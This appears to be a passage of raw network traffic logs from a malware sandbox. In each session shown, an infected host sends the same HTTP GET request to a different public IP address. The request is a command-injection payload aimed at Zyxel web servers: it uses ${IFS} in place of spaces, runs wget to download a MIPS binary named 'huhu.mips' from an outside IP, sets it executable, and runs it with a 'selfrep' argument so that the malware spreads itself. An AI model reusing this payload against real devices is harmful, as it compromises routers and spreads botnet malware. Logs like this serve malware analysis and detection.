                                                      Feb 2, 2024 06:35:09.162873983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      388192.168.2.1438430155.63.140.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162911892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      389192.168.2.1459236203.1.187.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162933111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      390192.168.2.143728276.211.20.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163037062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      391192.168.2.14389025.242.221.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163050890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      392192.168.2.1448250172.246.243.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163073063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      393192.168.2.1449178159.152.40.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163235903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      394192.168.2.14479501.152.111.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163270950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      395192.168.2.1442040216.18.199.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163309097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      396192.168.2.143445017.116.153.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163336039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      397192.168.2.1453878194.108.98.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163357973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      398192.168.2.1448080174.160.206.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163615942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      399192.168.2.1459732213.52.182.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163615942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      400192.168.2.144640640.77.250.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163616896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      401192.168.2.145561873.137.171.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163767099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      402192.168.2.144278820.112.165.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.163768053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      403192.168.2.1442510148.129.219.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167278051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      404192.168.2.1453556116.84.99.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167458057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      405192.168.2.144870845.191.58.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167505980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      406192.168.2.1456156147.218.191.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167553902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      407192.168.2.143731420.225.120.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167697906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      408192.168.2.1452706114.17.21.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167849064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      409192.168.2.1460696206.20.66.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.167973042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      410192.168.2.1442164162.89.94.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.168062925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      411192.168.2.143375099.99.231.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.168076038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      412192.168.2.1450990202.167.212.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:10.168744087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      413192.168.2.14564025.4.61.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.171884060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      414192.168.2.1445826140.30.7.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.171962976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      415192.168.2.145906895.196.38.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.171968937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      416192.168.2.144643285.113.74.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.171999931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      417192.168.2.1437678136.138.156.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172044992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      418192.168.2.145129891.36.52.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172056913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      419192.168.2.145111048.101.236.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172100067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      420192.168.2.1440468179.20.212.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172122955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      421192.168.2.1458946202.182.249.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172147989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      422192.168.2.1455218171.169.4.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172198057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      423192.168.2.145790659.82.71.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172198057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      424192.168.2.145272434.43.56.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172240019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      425192.168.2.1445296138.24.152.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172384024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      426192.168.2.143883251.236.249.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172427893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      427192.168.2.1445860133.157.2.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172467947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      428192.168.2.1446938106.49.201.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172524929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      429192.168.2.1457040209.7.42.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172532082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      430192.168.2.1447390169.103.174.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:11.172617912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      431192.168.2.1456766221.75.87.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176409960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      432192.168.2.1447686195.16.180.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176434040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      433192.168.2.14401185.202.1.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176471949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      434192.168.2.1432796190.108.95.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176497936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      435192.168.2.143791088.253.62.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176531076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      436192.168.2.145559874.79.207.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176547050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      437192.168.2.1453256209.166.122.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176595926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      438192.168.2.1450334218.202.32.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176606894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      439192.168.2.1444866161.222.164.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176636934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      440192.168.2.1460714109.7.112.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176697016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      441192.168.2.1437804181.71.163.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176703930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      442192.168.2.1454630120.101.99.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176803112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      443192.168.2.14398349.224.143.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176840067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      444192.168.2.143762889.127.153.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176883936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      445192.168.2.1450826158.87.55.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176896095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      446192.168.2.1457320217.30.98.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.176950932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      447192.168.2.1450172173.79.161.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.177036047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      448192.168.2.146030699.181.147.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.177108049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      449192.168.2.144045831.219.89.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:12.177144051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      450192.168.2.144514413.171.248.217443
                                                      TimestampBytes transferredDirectionData
